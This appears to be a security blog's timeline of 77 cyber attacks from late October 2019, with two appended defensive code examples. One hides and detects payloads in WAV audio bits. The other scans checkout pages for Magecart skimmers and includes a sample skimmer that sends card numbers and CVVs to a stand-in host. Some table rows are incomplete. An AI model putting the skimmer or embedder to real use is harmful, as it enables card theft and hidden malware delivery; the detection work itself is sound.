With this post I finally publish the second timeline of October (the first one is here), covering the main cyber attacks that occurred in the second half of the month (plus a couple of events that occurred in September but were not included in the previous timeline). For the record, in this second fortnight I have collected 75 events.
As usual the timeline is rich in events, some of them with huge implications, and I really don’t know where to start. In terms of cyber crime, BEC scammers keep raising the bar: the American subsidiary of Nikkei lost roughly $29 million after an employee transferred the money to a bank account under the control of the attackers. The City of Ocala suffered the same fate, with “minor” consequences: “only” $742,000 redirected to the scammers’ bank account. Other important events include the breach at Web.com, the discovery of more than 1.3 million Indian payment card details up for sale, a breach at UniCredit, and a massive DDoS attack crippling AWS.
And while ransomware gangs are always extremely active (the City of Johannesburg is the most important victim of this timeline), the cyber espionage front is equally hot: APT29 is back after an apparent break; APT28, APT41 and Turla are as active as ever; CCleaner suffered another compromise attempt by alleged Chinese threat actors; and the Czech Republic has unearthed an alleged Russian cyber espionage operation.
For the complete list you need to browse the entire timeline, and don’t forget to share it to support my work and spread the concept of risk awareness across the community. Of course, feel free to contribute by suggesting notable cyber events, and do not forget to follow @paulsparrows on Twitter, or connect on LinkedIn, for the latest updates.
Attack Class codes: CC = Cyber Crime, CE = Cyber Espionage, H = Hacktivism, CW = Cyber Warfare. A Country of “>1” means the victims are spread over several countries; “?” in the Author column means the attacker is unknown.

| ID | Date | Author | Target | Description | Attack | Target Class | Attack Class | Country | Tags |
|---|---|---|---|---|---|---|---|---|---|
| 1 | 17/9/2019 | ? | Magellan Health | Magellan Health issues a statement saying two of its subsidiaries, National Imaging Associates and Magellan Healthcare, "discovered a potential data breach related to a phishing attack." | Account Hijacking | Q Human health and social work activities | CC | US | Magellan Health |
| 2 | 27/9/2019 | ? | Meridian Lightweight Technologies | Meridian Lightweight Technologies, a supplier of lightweight magnesium for car parts, is hit by a ransomware attack. | Malware | C Manufacturing | CC | CA | Meridian Lightweight Technologies, ransomware |
| 3 | 16/10/2019 | ? | Web.com | Web.com, the parent company of the world's first domain registrar Network Solutions, discloses a security breach that occurred in August 2019, when a third party infiltrated some of the company's systems. Register.com is affected as well. | Unknown | J Information and communication | CC | US | Web.com, Network Solutions, Register.com |
| 4 | 16/10/2019 | ? | Single individuals | Researchers from Check Point reveal that the Phorpiex botnet earned $115,000 in five months just from mass-spamming sextortion emails. | Malicious Spam | X Individual | CC | >1 | Check Point, Phorpiex |
| 5 | 16/10/2019 | ? | Financial Institutions | Researchers from Proofpoint discover two new malware strains distributed over the last two months via phishing campaigns carried out by the TA505 group: a new downloader dubbed Get2 and an undocumented remote access Trojan (RAT) named SDBbot. | Targeted Attack | K Financial and insurance activities | CC | >1 | Proofpoint, TA505, Get2, SDBbot |
| 6 | 16/10/2019 | ? | Unsecured Docker Hosts | Researchers from Palo Alto Networks discover Graboid, a new cryptojacking campaign that uses Docker images to deliver a worm to unsecured Docker hosts; the worm follows a seemingly erratic plan in which the miner is active for about four minutes at a time on an infected host. | Malware | Y Multiple Industries | CC | >1 | Palo Alto Networks, Graboid |
| 7 | 16/10/2019 | ? | International airport in Europe | Researchers from Cyberbit uncover a large cryptominer infection at an unnamed "international airport in Europe". | Malware | H Transportation and storage | CC | N/A | Cyberbit, Crypto, Europe |
| 8 | 16/10/2019 | ? | Undisclosed Target | BlackBerry Cylance threat researchers discover the obfuscated malicious code of a cryptominer hidden inside WAV audio files, using steganography to evade detection. | Malware | Z Unknown | CC | N/A | BlackBerry Cylance, steganography |
| 9 | 16/10/2019 | ? | WordPress sites | Researchers from Sucuri discover a number of compromised websites containing a plugin called "wpframework", planted by bad actors to gain and maintain unauthorized access to the site environment and mine cryptocurrency. | Malicious WordPress plugins | Y Multiple Industries | CC | >1 | Sucuri, wpframework, WordPress |
| 10 | 17/10/2019 | Cozy Bear AKA APT29, The Dukes | Ministries of Foreign Affairs in at least three European countries and the Washington, DC embassy of a European Union country | Researchers from ESET discover Operation Ghost, a new campaign carried out by the Russian threat actor Cozy Bear. | Targeted Attack | O Public administration and defence, compulsory social security | CE | >1 | ESET, Cozy Bear, APT29, The Dukes |
| 11 | 17/10/2019 | ? | Billtrust | U.S. financial services provider Billtrust experiences an outage affecting all of its services after some of the company's computing systems are hit by a malware attack, allegedly the BitPaymer ransomware. | Malware | K Financial and insurance activities | CC | US | Billtrust, BitPaymer, ransomware |
| 12 | 17/10/2019 | ? | Stripe users | A phishing campaign using fake "invalid account" Stripe support alerts as lures is spotted attempting to harvest customers' bank account information and user credentials through booby-trapped Stripe customer login pages. | Account Hijacking | K Financial and insurance activities | CC | >1 | Stripe |
| 13 | 17/10/2019 | ? | WordPress sites | Researchers from Sucuri discover a new wave of infections that install fake plugins with backdoor functionality. | Malicious WordPress plugins | Y Multiple Industries | CC | >1 | WordPress, Sucuri |
| 14 | 17/10/2019 | ? | Single individuals | The Spelevo exploit kit is spotted infecting victims with Maze ransomware payloads via a new malicious campaign that exploits the Flash Player vulnerability CVE-2018-15982. | | | | | |
| 15 | | | Universiti Malaya | The Universiti Malaya E-Pay Cashless Payment and Records portal is hacked, but apparently no data is compromised. | Unknown | P Education | CC | MY | Universiti Malaya |
| 16 | 18/10/2019 | ? | Russian-speaking Dark Web users | Researchers from ESET discover a trojanized Tor Browser distributed by cybercriminals to steal bitcoins from darknet market buyers. | Malware | X Individual | CC | RU | ESET, Tor, Dark Web, Crypto |
| 17 | 20/10/2019 | ? | NordVPN | NordVPN is compromised: the private key of a (by then expired) TLS certificate for its website is publicly leaked on the Internet. The company confirms the breach of one of its servers dates back to March 2018. | Third-Party vulnerability | S Other service activities | CC | PA | NordVPN |
| 18 | 20/10/2019 | ? | TorGuard | TorGuard also confirms having suffered a breach, in September 2017. | Unknown | S Other service activities | CC | US | TorGuard |
| 19 | 20/10/2019 | ? | VikingVPN | OpenVPN keys and configuration files from VikingVPN are also leaked online. | Unknown | S Other service activities | CC | US | VikingVPN |
| 20 | 20/10/2019 | ? | San Bernardino City Unified School District | The San Bernardino City Unified School District is knocked offline by a ransomware attack. | Malware | P Education | CC | US | San Bernardino City Unified School District, ransomware |
| 21 | 21/10/2019 | Russia? | Czech Republic | Czech government officials reveal that they dismantled a Russian cyber-espionage network operating in the country. The attack occurred in March. | Targeted Attack | O Public administration and defence, compulsory social security | CE | CZ | Russia, Czech Republic |
| 22 | 21/10/2019 | Winnti AKA APT41 | Multiple Targets | Researchers from ESET reveal that Chinese cyber-spies from the Winnti group have developed a malware, dubbed skip-2.0, that alters Microsoft SQL Server (MSSQL) databases and creates a backdoor mechanism that lets the attackers access them. | Targeted Attack | Y Multiple Industries | CE | >1 | Winnti, APT41, MSSQL, Microsoft SQL |
| 23 | 21/10/2019 | Turla | Organizations in at least 20 different countries | British security officials reveal that the Russian group known as “Turla” has hijacked the infrastructure of the Iranian APT34 group to successfully hack organizations in at least 20 different countries over the last 18 months. | Targeted Attack | Y Multiple Industries | CE | >1 | Turla, APT34 |
| 24 | 21/10/2019 | Attackers from China? | Avast | Avast discloses a security breach of its internal network. The attack's purpose was to insert malware into the CCleaner software, as in the 2017 incident. The attacker got in with a compromised employee's VPN credentials, through a temporary VPN profile that did not require multi-factor authentication. | Account Hijacking | M Professional scientific and technical activities | CE | CZ | Avast, CCleaner |
| 25 | 21/10/2019 | ? | Single individuals | Researchers at Fortinet uncover a new Remcos campaign, with the new variant titled "2.5.0 Pro". | Malware | X Individual | CC | >1 | Fortinet, Remcos |
| 26 | 22/10/2019 | ? | Amazon Web Services, AWS | Amazon Web Services (AWS) suffers a major DDoS attack against its Route 53 DNS service that makes AWS resources unreachable for some customers for several hours. | DDoS | J Information and communication | CC | >1 | Amazon Web Services, AWS |
| 27 | 22/10/2019 | ? | Lottomatica | Lottomatica is hit by a DDoS attack that lasts for more than two weeks. | DDoS | R Arts entertainment and recreation | CC | IT | Lottomatica |
| 28 | 22/10/2019 | ? | Kalispell Regional Healthcare | Kalispell Regional Healthcare notifies nearly 130,000 patients whose personal information may have been compromised after a phishing attack that occurred in May 2019. | Account Hijacking | Q Human health and social work activities | CC | US | Kalispell Regional Healthcare |
| 29 | 22/10/2019 | ? | Multiple Targets | A new ransomware called MedusaLocker is being actively distributed, with victims seen all over the world. | Malware | Y Multiple Industries | CC | >1 | MedusaLocker, ransomware |
| 30 | 22/10/2019 | ? | Chilean Carabineros | The Chilean Carabineros are hacked and the attackers leak 10,000 sensitive files. | Unknown | O Public administration and defence, compulsory social security | H | CL | Carabineros |
| 31 | 22/10/2019 | ? | Pine County | Pine County says that around 4,400 people may have had their data breached after a county employee's email account was accessed by an unauthorized party. | Account Hijacking | O Public administration and defence, compulsory social security | CC | US | Pine County |
| 32 | 23/10/2019 | ? | Multiple Targets | The US Federal Bureau of Investigation issues a warning to the US private sector about Magecart attacks. | Malicious Script Injection | Y Multiple Industries | CC | US | FBI, Magecart |
| 33 | 23/10/2019 | ? | Discord users | A new malware named Spidey Bot targets Discord users by modifying the Windows Discord client, turning it into a backdoor and an information-stealing Trojan. | Malware | X Individual | CC | >1 | Spidey Bot, Discord |
| 34 | 24/10/2019 | ? | Human rights organizations across the world, including the Red Cross, UNICEF, the UN World Food Programme and the UN Development Programme | Researchers from Lookout reveal that over the past few months a pervasive spear-phishing campaign has hit human rights organizations across the world, including the Red Cross, UNICEF, the UN World Food Programme and the UN Development Programme. | Account Hijacking | U Activities of extraterritorial organizations and bodies | CE | N/A | Lookout, Red Cross, UNICEF, UN World Food Programme, UN Development Programme |
| 35 | 24/10/2019 | ? | Companies in the financial sector | Three different security companies (Group-IB, Link11 and Radware) reveal that a group of criminals has been launching DDoS attacks against companies in the financial sector and demanding ransom payments while posing as "Fancy Bear". | DDoS | K Financial and insurance activities | CC | >1 | Group-IB, Link11, Radware, Fancy Bear |
| 36 | 24/10/2019 | Shadow Kill Hackers | City of Johannesburg | The City of Johannesburg shuts down its website and billing systems after a group hacks into the authority’s systems and demands a ransom of four Bitcoins, worth about $30,000. | Malware | O Public administration and defence, compulsory social security | CC | ZA | City of Johannesburg, Shadow Kill Hackers, ransomware |
| 37 | 24/10/2019 | ? | iOS users | Researchers from Wandera discover 17 malicious iPhone apps infected with iOS clicker malware. The apps secretly click on adverts, generating income for cyber criminals. | Malware | X Individual | CC | >1 | Wandera, iOS, iOS Clicker |
| 38 | 24/10/2019 | ? | Single individuals | Researchers at Cybereason reveal the details of Raccoon, a new malware-as-a-service platform gaining popularity among cyber criminals. | Malware | X Individual | CC | >1 | Cybereason, Raccoon |
| 39 | 25/10/2019 | ? | South African Banks | The South African Banking Risk Information Centre (SABRIC) announces that the South African banking industry has been hit by a wave of DDoS attacks targeting consumer-facing services. | DDoS | K Financial and insurance activities | CC | ZA | South African Banking Risk Information Centre, SABRIC |
| 40 | 25/10/2019 | ? | Single individuals | A new ransomware called FuxSocy is discovered; it borrows much of its behavior from the notorious and now-defunct Cerber ransomware. | Malware | X Individual | CC | >1 | FuxSocy, ransomware |
| 41 | 25/10/2019 | ? | Procter & Gamble's First Aid Beauty | In May hackers planted an e-skimmer on the website of Procter & Gamble's First Aid Beauty brand; the Magecart script is still stealing payment card data at the time of disclosure and only targets visitors from the US. | Malicious Script Injection | G Wholesale and retail trade | CC | US | Procter & Gamble's First Aid Beauty, Magecart |
| 42 | 25/10/2019 | ? | Betty Jean Kerr People’s Health Centers | Betty Jean Kerr People’s Health Centers was hit last September by a ransomware attack that continues to prevent access to data collected from patients, health care providers and employees. | Malware | Q Human health and social work activities | CC | US | Betty Jean Kerr People’s Health Centers, ransomware |
| 43 | 26/10/2019 | ? | Vulnerable PHP Servers | Threat intelligence firm Bad Packets reveals that a recently patched security flaw in PHP-FPM (CVE-2019-11043), reachable on certain nginx + PHP-FPM configurations, is being exploited in the wild to take over servers. | CVE-2019-11043 vulnerability | Y Multiple Industries | CC | >1 | Bad Packets, PHP, CVE-2019-11043 |
| 44 | 27/10/2019 | ? | Multiple Targets in Turkey | Turkish officials confirm that cyberattacks targeting Türk Telekom and Garanti BBVA, among many others, were behind the nationwide disruption of internet traffic. | DDoS | Y Multiple Industries | CC | TR | Türk Telekom, Garanti BBVA |
| 45 | 28/10/2019 | APT28 AKA Fancy Bear, Strontium | 16 national and international sporting and anti-doping organizations | Microsoft reveals that APT28 has targeted at least 16 national and international sporting and anti-doping organizations ahead of next year's Tokyo Olympics. | Targeted Attack | U Activities of extraterritorial organizations and bodies | CE | >1 | Microsoft, APT28, Tokyo, Fancy Bear, Strontium |
| 46 | 28/10/2019 | ? | More than 2,000 websites in Georgia | A huge cyber-attack knocks out more than 2,000 websites in the country of Georgia after Pro-Service, a local hosting provider, is breached. In many cases home pages are replaced with an image of former President Mikheil Saakashvili and the caption "I'll be back". | Unknown | Y Multiple Industries | H | GE | Mikheil Saakashvili, Pro-Service |
| 47 | 28/10/2019 | ? | UniCredit | UniCredit uncovers a data breach involving the personal records of 3 million domestic clients, contained in a compromised file generated in 2015. | Unknown | K Financial and insurance activities | CC | IT | UniCredit |
| 48 | 28/10/2019 | ? | Sixth June | French fashion online store Sixth June has been infected for some time with code that steals payment card information at checkout. | Malicious Script Injection | G Wholesale and retail trade | CC | FR | Sixth June, Magecart |
| 49 | 28/10/2019 | ? | City of Ocala | The City of Ocala in Florida falls victim to a business email compromise (BEC) scam that ends with over $742,000 redirected to a bank account controlled by the fraudster(s). | BEC | O Public administration and defence, compulsory social security | CC | US | City of Ocala |
| 50 | 28/10/2019 | ? | Krystal | U.S. fast-food restaurant chain Krystal discloses a security incident involving one of its payment processing systems and affecting some of its restaurants between July and September 2019. | PoS Malware | I Accommodation and food service activities | CC | US | Krystal |
| 51 | 28/10/2019 | SWEED | Precision engineering companies in Italy | Researcher Marco Ramilli discovers a campaign against precision engineering companies in Italy. | Targeted Attack | C Manufacturing | CE | IT | Marco Ramilli, SWEED |
| 52 | 28/10/2019 | ? | WordPress and Blogger sites | In a new campaign, scammers hack into WordPress and Blogger sites and use the hijacked accounts to publish posts stating that the blogger's computer has been hacked and that they were recorded while visiting adult websites. | Unknown | X Individual | CC | >1 | WordPress, Blogger |
| 53 | 28/10/2019 | ? | American Cancer Society | A Magecart attack is detected in the American Cancer Society online store. | Malicious Script Injection | Q Human health and social work activities | CC | US | American Cancer Society |
| 54 | 29/10/2019 | ? | Indian users | Researchers from Group-IB discover more than 1.3 million Indian payment card details put up for sale on Joker's Stash, the internet's largest carding shop. | Unknown | K Financial and insurance activities | CC | IN | Group-IB, Joker's Stash |
| 55 | 29/10/2019 | ? | Android users | Researchers from Symantec observe a surge in detections of xHelper, a persistent malicious Android application that can hide itself from users, download additional malicious apps and display advertisements. xHelper has infected over 45,000 devices in the past six months. | Malware | X Individual | CC | >1 | Symantec, Android, xHelper |
| 56 | 29/10/2019 | ? | Multiple Targets | Researchers from Menlo Security discover a new variant of the Adwind RAT, delivered via an obfuscated initial JAR file. | Malware | Y Multiple Industries | CC | >1 | Menlo Security, Adwind |
| 57 | 29/10/2019 | ? | Bed Bath & Beyond | Bed Bath & Beyond discloses that an unauthorized party obtained login information for some of its customers (about 1% of its customer base). | Unknown | G Wholesale and retail trade | CC | US | Bed Bath & Beyond |
| 58 | 29/10/2019 | ? | Italian users | The Maze ransomware is pushed by a new spam campaign that targets Italian users by impersonating the country's Tax and Revenue Agency (Agenzia delle Entrate). | Malware | X Individual | CC | IT | Maze, Italy, Tax and Revenue Agency |
| 59 | 29/10/2019 | ? | Las Cruces Public Schools | A ransomware attack hits Las Cruces Public Schools and forces the district to shut down its entire computer system to contain the infection. | Malware | P Education | CC | US | Las Cruces Public Schools, ransomware |
| 60 | 29/10/2019 | ? | Prisma Health | Prisma Health discloses a cyber attack after an employee falls victim to a phishing attack. | Account Hijacking | Q Human health and social work activities | CC | US | Prisma Health |
| 61 | 30/10/2019 | ? | Nikkei America | Nikkei loses roughly $29 million after an employee of its Nikkei America subsidiary is tricked by scammers into sending the funds to a bank account under their control. | BEC | J Information and communication | CC | US | Nikkei America |
| 62 | 30/10/2019 | Lazarus Group | Nuclear Power Corporation of India Ltd (NPCIL) | Nuclear Power Corporation of India Ltd (NPCIL) confirms that the administrative network of one of its nuclear power plants (Kudankulam) was infected with malware. Several security researchers identify the malware as a version of DTrack, a backdoor trojan developed by the Lazarus Group. | Targeted Attack | D Electricity gas steam and air conditioning supply | CE | IN | Nuclear Power Corporation of India Ltd, NPCIL, DTrack, Lazarus Group |
| 63 | 30/10/2019 | Russia? | Madagascar, Central African Republic, Mozambique, Democratic Republic of the Congo, Côte d'Ivoire, Cameroon, Sudan and Libya | Facebook removes a network of Russian-run accounts which it says were attempting to interfere in politics in Madagascar, Central African Republic, Mozambique, Democratic Republic of the Congo, Côte d'Ivoire, Cameroon, Sudan and Libya. | Fake Social Networks Accounts | O Public administration and defence, compulsory social security | CW | >1 | Facebook, Russia, Madagascar, Central African Republic, Mozambique, Democratic Republic of the Congo, Côte d'Ivoire, Cameroon, Sudan, Libya |
| 64 | 30/10/2019 | ? | Marriott International | Marriott International notifies some of its associates of an incident that exposed their Social Security numbers (SSNs) to an unknown party, who may have accessed the information from the network of an unnamed vendor. | Unknown | I Accommodation and food service activities | CC | US | Marriott International |
| 65 | 30/10/2019 | ? | Multiple Targets | Researchers from McAfee Labs observe a new phishing campaign using a fake voicemail message to lure victims into entering their Office 365 email credentials. | Account Hijacking | Y Multiple Industries | CE | >1 | McAfee, Office 365 |
| 66 | 30/10/2019 | ? | Android users | Researchers at Upstream reveal that a keyboard app called ai.type, previously available on the Play Store, has been making millions of unauthorized purchases of premium digital content. The Android app has been downloaded more than 40 million times. | Malware | X Individual | CC | >1 | Upstream, Play Store, ai.type |
| 67 | 30/10/2019 | ? | Ontario Science Centre | A third-party email vendor for the Ontario Science Centre suffers a data breach exposing some PII of 174,000 of the Centre’s members, donors and customers. The breach occurred on August 16. | Account Hijacking | R Arts entertainment and recreation | CC | CA | Ontario Science Centre |
| 68 | 31/10/2019 | ? | Chrome users | Google discloses a Chrome 0-day vulnerability (CVE-2019-13720) exploited in the wild as part of Operation WizardOpium, discovered by researchers from Kaspersky Lab. | | | | | |
| 69 | 31/10/2019 | APT41 | | Researchers from FireEye discover a new malware family used by APT41, named MESSAGETAP, designed to monitor and save SMS traffic matching specific phone numbers, IMSI numbers and keywords for subsequent theft. | Targeted Attack | J Information and communication | CE | N/A | FireEye, APT41, MESSAGETAP |
| 70 | 31/10/2019 | Hidden Cobra AKA Lazarus Group | Multiple targets in the US | The Department of Homeland Security, FBI and Department of Defense release a notification on HOPLIGHT, a data-collecting trojan used by the North Korean cyber-espionage group Hidden Cobra (aka Lazarus). | Targeted Attack | Y Multiple Industries | CE | US | Department of Homeland Security, FBI, Department of Defense, Hoplight, Hidden Cobra, Lazarus |
| 71 | 31/10/2019 | ? | Winamax | Winamax is hit by a DDoS attack. | DDoS | R Arts entertainment and recreation | CC | FR | Winamax |
| 72 | 31/10/2019 | ? | QNAP NAS devices | Hackers infect thousands of network-attached storage (NAS) devices from Taiwanese vendor QNAP with a new strain of malware named QSnatch. Over 7,000 infections have been reported in Germany alone. | Malware | Y Multiple Industries | CC | >1 | QNAP, QSnatch |
| 73 | 31/10/2019 | ? | Vulnerable ZYXEL P660HN-T1A routers | Researchers from Palo Alto Networks discover a new variant of the Gafgyt botnet targeting vulnerable ZYXEL P660HN-T1A routers by exploiting CVE-2017-18368. | | | | | |
| 74 | 31/10/2019 | | | Researchers from Cofense discover a new phishing campaign trying to trick victims into handing over their Microsoft Office 365 account credentials via a fake salary-increase Excel sheet. | Account Hijacking | Y Multiple Industries | CC | >1 | Cofense |
| 75 | 31/10/2019 | ? | Single individuals | A new Emotet campaign celebrates Halloween by pushing out new spam templates inviting the victim to a party. | Malware | X Individual | CC | >1 | Emotet |
| 76 | 31/10/2019 | Calypso APT | State institutions in India, Brazil, Kazakhstan, Russia, Thailand and Turkey | Researchers at Positive Technologies reveal that a Chinese-speaking APT group, Calypso, has been actively targeting state institutions in six countries. | Targeted Attack | O Public administration and defence, compulsory social security | CE | >1 | Positive Technologies, Calypso, India, Brazil, Kazakhstan, Russia, Thailand, Turkey |
| 77 | 31/10/2019 | ? | Utah Valley Eye Center | Hackers access the Utah Valley Eye Center's third-party appointment-reminder portal (DemandForce) and use it to send patients emails claiming they had received a payment from PayPal. The incident occurred on June 18, 2018. | | | | | |
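The WAV steganography in entry 8 (BlackBerry Cylance) hides a loader inside ordinary-looking audio. What follows is an added example, not code from the original post or from BlackBerry Cylance: it embeds and recovers a payload in the least-significant bit of each 16-bit PCM sample, the simplest of the hiding schemes in that class, and adds the triage check a defender can run over a suspicious .wav. The cover tone, the container layout (a 32-bit big-endian length followed by the payload) and the stand-in payload are all constructed for the example and are not what any real sample used.

```python
"""Added example: LSB audio steganography embed/extract plus a triage check.
Not code from the original post or from BlackBerry Cylance; the cover audio,
container layout and payload below are constructed for illustration."""
import io
import math
import struct
import wave

SAMPLE_RATE = 8000  # assumed cover format: 8 kHz, 16-bit, mono PCM
HEADER_BITS = 32    # assumed container: 32-bit big-endian payload length, then payload


def make_cover_wav(n_samples: int = SAMPLE_RATE) -> bytes:
    """Constructed cover: one second of a 440 Hz tone as 16-bit mono PCM."""
    frames = bytearray()
    for i in range(n_samples):
        value = int(round(8000 * math.sin(2 * math.pi * 440 * i / SAMPLE_RATE)))
        frames += struct.pack("<h", value)
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(SAMPLE_RATE)
        w.writeframes(bytes(frames))
    return buf.getvalue()


def _read_samples(wav_bytes: bytes):
    with wave.open(io.BytesIO(wav_bytes), "rb") as w:
        if w.getsampwidth() != 2 or w.getnchannels() != 1:
            raise ValueError("example handles 16-bit mono PCM only")
        params = w.getparams()
        raw = w.readframes(w.getnframes())
    return params, list(struct.unpack("<%dh" % (len(raw) // 2), raw))


def _write_samples(params, samples) -> bytes:
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setparams(params)
        w.writeframes(struct.pack("<%dh" % len(samples), *samples))
    return buf.getvalue()


def _lsb_bits(samples, n_bits):
    # Python's & on a negative int works on its two's-complement form, so the
    # LSB of a negative sample is recovered correctly.
    return [s & 1 for s in samples[:n_bits]]


def _bits_to_bytes(bits):
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        byte = 0
        for bit in bits[i:i + 8]:
            byte = (byte << 1) | bit
        out.append(byte)
    return bytes(out)


def embed_lsb(wav_bytes: bytes, payload: bytes) -> bytes:
    """Overwrite one LSB per sample with the bits of len(payload) || payload.
    Changing the LSB moves each sample by at most 1/32768 of full scale, so the
    audio still plays normally."""
    params, samples = _read_samples(wav_bytes)
    container = struct.pack(">I", len(payload)) + payload
    bits = [(b >> (7 - k)) & 1 for b in container for k in range(8)]
    if len(bits) > len(samples):
        raise ValueError("payload does not fit: %d bits > %d samples" % (len(bits), len(samples)))
    for i, bit in enumerate(bits):
        samples[i] = (samples[i] & ~1) | bit
    return _write_samples(params, samples)


def _declared_length(samples) -> int:
    return struct.unpack(">I", _bits_to_bytes(_lsb_bits(samples, HEADER_BITS)))[0]


def extract_lsb(wav_bytes: bytes) -> bytes:
    """Read the length header from the LSB plane, then that many payload bytes."""
    _, samples = _read_samples(wav_bytes)
    total = HEADER_BITS + 8 * _declared_length(samples)
    if total > len(samples):
        raise ValueError("declared payload length exceeds LSB capacity")
    return _bits_to_bytes(_lsb_bits(samples, total))[HEADER_BITS // 8:]


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte (0.0 for empty input, 8.0 for uniform bytes)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts if c)


def lsb_triage(wav_bytes: bytes) -> dict:
    """Triage: does a plausible LSB container decode to something code-like?"""
    _, samples = _read_samples(wav_bytes)
    length = _declared_length(samples)
    if length == 0 or HEADER_BITS + 8 * length > len(samples):
        return {"suspicious": False, "reason": "no plausible LSB container"}
    payload = extract_lsb(wav_bytes)
    if payload[:2] == b"MZ":
        return {"suspicious": True, "reason": "LSB payload starts with a PE header"}
    ent = shannon_entropy(payload)
    if ent > 7.0:
        return {"suspicious": True, "reason": "high-entropy LSB payload (%.2f bits/byte)" % ent}
    return {"suspicious": False, "reason": "LSB payload looks benign"}


if __name__ == "__main__":
    cover = make_cover_wav()
    payload = b"MZ" + bytes(range(256))  # constructed stand-in for a PE loader
    stego = embed_lsb(cover, payload)
    assert extract_lsb(stego) == payload
    print(lsb_triage(cover), lsb_triage(stego))
```

The length header is what lets the demonstration round-trip cleanly; a real loader will not announce its own size, so the part of the triage that generalises is decoding the LSB plane and looking at what comes out. A PE header or a near-uniform byte stream recovered from the low bits is a reason to detonate the file in a sandbox rather than trust the .wav extension, while the same bits from untouched audio decode to nothing coherent.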
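Entries 32, 41, 48 and 53 are all Magecart-style skimmers: a script injected into a checkout page reads the card fields and ships them to a host the attacker controls. What follows is an added example, not code from the original post, from the FBI alert or from any merchant in the table: it inventories the scripts on a checkout page, flags external scripts served from hosts outside the merchant's own allowlist or loaded without Subresource Integrity, flags inline scripts that both read payment fields and contain an exfiltration or obfuscation primitive, and emits the Content-Security-Policy that would have stopped the sample skimmer. The allowlist hosts, the sample page and the skimmer inside it are constructed for the example.

```python
"""Added example: first-pass detection of Magecart-style skimmers in a checkout
page. Not code from the original post or from any vendor or merchant it names;
the allowlist, the sample page and the skimmer in it are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed: hosts a hypothetical shop legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example", "js.stripe.com"}

# A skimmer has to touch the card fields, and it has to get the data off the page.
PAYMENT_FIELD_RE = re.compile(r"(card|cc)[_-]?(number|num)|cvv|cvc|expir", re.I)
EXFIL_RE = re.compile(r"\bfetch\(|XMLHttpRequest|sendBeacon|new\s+Image\(|\.src\s*=\s*['\"]https?:", re.I)
OBFUSCATION_RE = re.compile(r"\batob\(|fromCharCode|(\\x[0-9a-f]{2}){4,}", re.I)


class ScriptInventory(HTMLParser):
    """Collects external script tags (src + integrity) and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []  # [{"src": ..., "integrity": ...}]
        self.inline = []    # script bodies as strings
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append({"src": a["src"], "integrity": a.get("integrity")})
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def audit_checkout_page(html: str, allowed_hosts=ALLOWED_SCRIPT_HOSTS) -> list:
    """Return (severity, message) findings for one page, in document order."""
    inv = ScriptInventory()
    inv.feed(html)
    findings = []
    for s in inv.external:
        host = urlparse(s["src"]).hostname  # None for relative (first-party) URLs
        if host is not None and host not in allowed_hosts:
            findings.append(("high", "external script from unexpected host %s: %s" % (host, s["src"])))
        elif not s["integrity"]:
            findings.append(("low", "script without Subresource Integrity: %s" % s["src"]))
    for body in inv.inline:
        touches_card = bool(PAYMENT_FIELD_RE.search(body))
        exfil = bool(EXFIL_RE.search(body))
        obfuscated = bool(OBFUSCATION_RE.search(body))
        if touches_card and (exfil or obfuscated):
            findings.append(("high", "inline script reads payment fields and %s"
                             % ("exfiltrates them" if exfil else "is obfuscated")))
        elif obfuscated:
            findings.append(("medium", "obfuscated inline script"))
    return findings


def script_src_policy(allowed_hosts=ALLOWED_SCRIPT_HOSTS) -> str:
    """CSP value for the checkout page: no 'unsafe-inline', so injected inline
    code does not run, and no image/connect destinations beyond the site."""
    hosts = " ".join("https://" + h for h in sorted(allowed_hosts))
    return "script-src 'self' %s; connect-src 'self'; img-src 'self'" % hosts


# Constructed sample page: one SRI-pinned first-party script, one allowed
# third party without SRI, one unknown host, and an inline skimmer that
# reads the card fields and leaks them through an image beacon.
SAMPLE_CHECKOUT = """
<html><head>
<script src="https://cdn.shop.example/checkout.js"
        integrity="sha384-AAAA" crossorigin="anonymous"></script>
<script src="https://js.stripe.com/v3/"></script>
<script src="https://static-analytics.example/tag.js"></script>
</head><body>
<form id="payment"><input name="cc_number"><input name="cvv"></form>
<script>
document.getElementById('payment').addEventListener('submit', function () {
  var d = {n: document.querySelector('[name=cc_number]').value,
           c: document.querySelector('[name=cvv]').value};
  new Image().src = 'https://static-analytics.example/i.gif?d=' + btoa(JSON.stringify(d));
});
</script>
</body></html>
"""

if __name__ == "__main__":
    for severity, message in audit_checkout_page(SAMPLE_CHECKOUT):
        print(severity.upper(), message)
    print("Content-Security-Policy:", script_src_policy())
```

A finding is a pointer for review, not proof: a legitimate tag manager trips the unexpected-host rule, and a real skimmer can be split across several scripts or hidden in a dependency on an allowed host (First Aid Beauty's skimmer ran for months on the merchant's own site). The policy returned by script_src_policy is the durable control: without 'unsafe-inline' in script-src the inline skimmer never executes, and img-src 'self' blocks the image-beacon exfiltration even if it did.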